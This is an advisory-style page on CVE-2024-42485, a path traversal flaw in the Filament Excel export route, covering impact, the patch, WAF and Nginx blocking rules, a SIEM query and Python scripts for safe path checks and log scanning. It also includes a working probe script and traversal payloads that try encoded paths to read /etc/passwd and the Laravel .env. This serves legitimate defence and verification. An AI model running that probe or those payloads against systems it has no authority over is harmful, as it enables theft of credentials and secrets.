CVE-2024-42485
📋 TL;DR
CVE-2024-42485 is a path traversal vulnerability in Filament Excel (pxlrbt/filament-excel) before version 2.3.3. The package's download route, `/filament-excel/{path}`, did not reject `../` sequences in the `{path}` parameter, so an unauthenticated attacker could walk out of the directory the route serves from and download arbitrary files that the PHP process can read. Any deployment running a vulnerable version with that route reachable from an untrusted network is affected.
💻 Affected Systems
- pxlrbt/filament-excel
📦 What is this software?
Filament Excel (pxlrbt/filament-excel) is a plugin for the Filament admin panel (Laravel) that adds Excel and CSV export actions to Filament tables. Exports are generated with Laravel Excel and made available for download through the package's `/filament-excel/{path}` route.
⚠️ Risk & Real-World Impact
Worst Case
Disclosure of any file the web server user can read outside the export directory: the Laravel `.env` (which holds `APP_KEY`, database and mail credentials and third-party API keys), application source, session and cache files under `storage/`, and possibly SSH keys or other secrets left readable. With those secrets an attacker can reach the database, decrypt or forge Laravel-encrypted cookies and pivot further. The traversal itself is read-only, so full server takeover is a follow-on step, not a direct result of the bug.
Likely Case
Unauthorized read access to application files, configuration and user data on the server filesystem, typically starting with `.env` and the contents of `storage/`.
If Mitigated
Limited to what the PHP worker can read: restrictive filesystem permissions keep the attacker away from other users' data and system secrets, and network restrictions on the admin panel keep the route off the internet. Note that the application's own `.env` and source are always readable by the PHP worker, so file permissions alone do not protect them.
🎯 Exploit Status
Exploitation is straightforward: a single crafted GET request to the vulnerable endpoint with a traversal sequence in the path, with no authentication and no tooling beyond an HTTP client that sends the path without normalising it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v2.3.3
Vendor Advisory: https://github.com/pxlrbt/filament-excel/security/advisories/GHSA-m3px-vjxr-fx4m
Restart Required: No (see the caveat in step 3)
Instructions:
1. Update Filament Excel to version 2.3.3 or later via Composer: `composer require pxlrbt/filament-excel:^2.3.3`.
2. Verify the installed version with `composer show pxlrbt/filament-excel` and confirm it reports 2.3.3 or later.
3. Standard PHP-FPM deployments pick up the new code on the next request. If OPcache runs with `opcache.validate_timestamps=0`, or the application runs under Laravel Octane, reload PHP-FPM or restart the Octane workers so the patched files are actually loaded.
🔧 Temporary Workarounds
Web Server Path Traversal Protection
Configure the web server (e.g., Apache, Nginx) to reject requests whose path contains a directory traversal sequence. Match both the literal `../` and its percent-encoded form, because the raw request line is what these checks see.
For Nginx: in the `server` block, add `if ($request_uri ~* "(\.\.|%2e%2e)") { return 403; }` (`$request_uri` is the un-normalised request line, unlike `$uri`, which Nginx has already decoded and normalised).
For Apache: use mod_security rules or `.htaccess` rewrite rules to reject `../` and `%2e%2e` patterns.
Application Firewall Rule
Implement WAF rules that block requests containing directory traversal patterns aimed at the vulnerable endpoint. Apply a URL-decoding transformation before matching so that encoded variants are caught as well.
Example ModSecurity rule: SecRule REQUEST_URI "@rx \.\./" "id:1001,phase:1,t:urlDecodeUni,deny,status:403,msg:'Path traversal'"
If the OWASP Core Rule Set is deployed, its LFI rules (930100 and 930110) already cover these patterns.
🧯 If You Can't Patch
- Restrict network access to the Filament admin interface, including the `/filament-excel/` route, using firewall rules or a reverse-proxy allow-list so that only trusted IPs reach it.
- Put authentication middleware in front of the `/filament-excel/{path}` route if your deployment leaves it unauthenticated. This only narrows who can exploit the bug; a logged-in user can still traverse, so treat it as a stopgap until the package is updated.
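The check that actually closes the hole is a containment test: resolve the requested path against the directory the route is allowed to serve and refuse anything that ends up outside it. The following is an added illustration in Python, not the project's patch and not Laravel code; `EXPORT_ROOT`, `naive_export_path` and `safe_export_path` are names chosen for the example, and the vulnerable shape shown in `naive_export_path` is the general pattern, not a claim about the package's exact code.

```python
from pathlib import Path
from typing import Optional
from urllib.parse import unquote

# Assumed export directory for the illustration; the real location depends on
# the application's filesystem disk configuration.
EXPORT_ROOT = Path("/srv/app/storage/filament-excel")


def _decode_fully(value: str, max_rounds: int = 3) -> Optional[str]:
    """Percent-decode until the string stops changing, so that %2e%2e%2f and
    the double-encoded %252e%252e%252f are both judged on their decoded form.
    Returns None if the value is still changing after max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    return None


def naive_export_path(requested: str, root: Path = EXPORT_ROOT) -> Path:
    """The vulnerable shape: join the user-supplied path onto the export
    directory and let the filesystem resolve it. Each '..' walks one level
    out of root, so '../../../../etc/passwd' lands on /etc/passwd."""
    return (root / unquote(requested)).resolve()


def safe_export_path(requested: str, root: Path = EXPORT_ROOT) -> Optional[Path]:
    """Hardened version: decode, resolve against the export directory and
    accept the result only if it still lies inside that directory.
    Returns None for anything that escapes."""
    decoded = _decode_fully(requested)
    if not decoded or "\x00" in decoded:
        return None
    # Backslashes are ordinary filename characters on Linux, but treating them
    # as separators (as Windows does) is the conservative choice; reject them,
    # and reject absolute paths, which Path joining would otherwise honour.
    if "\\" in decoded or decoded.startswith("/"):
        return None
    root_resolved = root.resolve()
    candidate = (root_resolved / decoded).resolve()
    # resolve() collapses '..' and follows symlinks, so a symlink inside the
    # export directory pointing at /etc would also fail this containment test.
    if candidate == root_resolved or root_resolved not in candidate.parents:
        return None
    return candidate


if __name__ == "__main__":
    for req in ("exports/report-2024.xlsx", "../../../../etc/passwd",
                "%2e%2e%2f%2e%2e%2f.env", "%252e%252e%252f%252e%252e%252f.env",
                "/etc/passwd"):
        print(f"{req!r:45} naive={naive_export_path(req)}  safe={safe_export_path(req)}")
```

The decode loop matters because a proxy or the framework may have decoded once already; the containment test on the resolved path is what makes the encoding irrelevant.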
🔍 How to Verify
Check if Vulnerable:
Run `composer show pxlrbt/filament-excel` and compare the installed version against 2.3.3. To confirm the behaviour, request `/filament-excel/../../etc/passwd` (or a deeper or percent-encoded variant) from a client that sends the path exactly as written: browsers and most HTTP libraries collapse `../` before sending, and a reverse proxy in front of the application may normalise or reject the literal form, so try the encoded variants as well. A 200 response carrying file contents, obtained without authentication, confirms the vulnerability.
Check Version:
composer show pxlrbt/filament-excel | grep versions
Verify Fix Applied:
After updating to v2.3.3+, repeat the same requests (literal and encoded); they must return an error (403 or 404) with no file contents.
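A probe that sends the traversal variants verbatim, as an added example (not from the advisory or the project). It uses `http.client` because that module writes the request line exactly as given, whereas a browser or a high-level HTTP library would collapse the `../` segments before the request leaves the client. `TARGET_HOST`, the depth range and the marker strings are assumptions for the illustration; the `.env` probe in particular only succeeds at the depth that matches where the export directory sits relative to the application root, which is why several depths are tried.

```python
import http.client
import ssl
from typing import Iterator, List, Tuple

# Constructed probe target; replace with the host under test.
TARGET_HOST = "admin.example.test"

# Byte patterns that identify a successful read of the two files most worth
# checking on a Laravel host: /etc/passwd and the application's .env.
MARKERS = {
    "etc/passwd": b"root:",
    ".env": b"APP_KEY=",
}


def probe_paths(target: str, depth: int) -> List[str]:
    """Return the traversal encodings worth trying for one target file at one
    depth. The first entry is the literal form; the others exist because a web
    server or WAF in front of the application may normalise or block the
    literal '../' yet pass an encoded variant through."""
    literal = "../" * depth + target
    return [
        "/filament-excel/" + literal,
        "/filament-excel/" + literal.replace("../", "%2e%2e/"),
        "/filament-excel/" + literal.replace("../", "..%2f"),
        "/filament-excel/" + literal.replace("../", "%2e%2e%2f"),
        "/filament-excel/" + literal.replace("../", "%252e%252e%252f"),
    ]


def classify(status: int, body: bytes, marker: bytes) -> str:
    """Turn one response into a verdict. A 2xx carrying the marker is a
    confirmed read; 4xx means the request was refused or the path does not
    exist; anything else needs a human look."""
    if status in (200, 206) and marker in body:
        return "vulnerable"
    if 400 <= status < 500:
        return "refused"
    return "inconclusive"


def probe(host: str, port: int = 443, use_tls: bool = True,
          max_depth: int = 6, timeout: float = 10.0) -> Iterator[Tuple[str, int, str]]:
    """Send every encoding at every depth for every marker file and yield
    (path, status, verdict). http.client does not normalise the path."""
    if use_tls:
        conn = http.client.HTTPSConnection(host, port, timeout=timeout,
                                           context=ssl.create_default_context())
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    for target, marker in MARKERS.items():
        for depth in range(1, max_depth + 1):
            for path in probe_paths(target, depth):
                conn.request("GET", path)
                resp = conn.getresponse()
                body = resp.read(64 * 1024)
                yield path, resp.status, classify(resp.status, body, marker)


if __name__ == "__main__":
    for path, status, verdict in probe(TARGET_HOST):
        print(f"{status} {verdict:12} {path}")
```

Run it once before and once after the Composer update; every line should read `refused` afterwards. Run it from a position that reaches the application directly as well as through the reverse proxy, since a proxy that rejects the literal form can mask a still-vulnerable backend.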
📡 Detection & Monitoring
Log Indicators:
- HTTP 200/206 responses to `/filament-excel/` paths containing `../` or its encoded forms (`%2e%2e%2f`, `..%2f`, `%252e%252e%252f`); these indicate a successful read
- 403/404 responses to the same patterns; these indicate probing and identify the scanning client
- Unusual file access patterns from unauthenticated sessions
Network Indicators:
- GET requests to `/filament-excel/{path}` with directory traversal patterns, plain or percent-encoded, from untrusted sources
SIEM Query:
source="web_logs" AND uri="/filament-excel/*" AND (uri="*../*" OR uri="*..\\*" OR uri="*%2e%2e%2f*" OR uri="*..%2f*" OR uri="*%252e%252e*")
(Splunk-style pseudo-syntax; adapt the field names to your SIEM, and match on a URL-decoded copy of the URI if your pipeline provides one, which removes the need to enumerate encodings.)
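Where no SIEM is in place, the same detection can be run directly over the web server's access log. The script below is an added example, not part of the advisory: it parses combined-format lines, percent-decodes the URI repeatedly so single- and double-encoded traversal sequences are both seen as `../`, restricts the match to the `/filament-excel/` route, and grades each hit by status code. The log lines in `SAMPLE_LOG` are constructed for the demonstration, not taken from a real host.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote

# Combined log format (nginx/Apache default). Only the fields used below are named.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# '..' used as a whole path component, with either separator, after decoding.
DOT_DOT_SEGMENT = re.compile(r'(^|[\\/])\.\.(?=[\\/]|$)')

ROUTE_PREFIX = "/filament-excel/"


def decode_fully(uri: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so %2e%2e%2f and %252e%252e%252f both become
    '../'. Stops as soon as a round changes nothing."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def is_traversal_against_route(uri: str) -> bool:
    """True when the decoded request path targets the export route and
    contains a '..' segment. The query string is ignored for the prefix test."""
    decoded = decode_fully(uri.split("?", 1)[0])
    return decoded.lower().startswith(ROUTE_PREFIX) and DOT_DOT_SEGMENT.search(decoded) is not None


def scan(lines: Iterable[str]) -> List[Dict]:
    """Return one finding per matching request. 2xx responses are reported as
    confirmed reads; anything else is an attempt, which still marks a probing
    client worth blocking."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or not is_traversal_against_route(m["uri"]):
            continue
        status = int(m["status"])
        findings.append({
            "client": m["client"],
            "time": m["time"],
            "uri": m["uri"],
            "decoded": decode_fully(m["uri"]),
            "status": status,
            "verdict": "confirmed-read" if status in (200, 206) else "attempt",
        })
    return findings


# Constructed sample lines for the demonstration; not from any real host.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Aug/2024:09:14:02 +0000] "GET /filament-excel/exports/report-2024.xlsx HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Aug/2024:09:15:40 +0000] "GET /filament-excel/../../../../etc/passwd HTTP/1.1" 200 2345 "-" "curl/8.4.0"',
    '203.0.113.9 - - [12/Aug/2024:09:15:41 +0000] "GET /filament-excel/%2e%2e%2f%2e%2e%2f.env HTTP/1.1" 403 162 "-" "curl/8.4.0"',
    '203.0.113.9 - - [12/Aug/2024:09:15:42 +0000] "GET /filament-excel/%252e%252e%252f%252e%252e%252f.env HTTP/1.1" 404 1209 "-" "curl/8.4.0"',
    '203.0.113.9 - - [12/Aug/2024:09:15:43 +0000] "GET /filament-excel/..%5c..%5c.env HTTP/1.1" 404 1209 "-" "curl/8.4.0"',
    '198.51.100.4 - - [12/Aug/2024:09:16:00 +0000] "GET /images/../favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['verdict']:15} {f['client']:14} {f['status']} {f['decoded']}")
```

On the sample, the first traversal line is the one that matters (a 200 with a body the size of a small file); the three 403/404 lines from the same client are the reconnaissance that preceded or followed it, and the `/images/../favicon.ico` line is ignored because it never touches the export route.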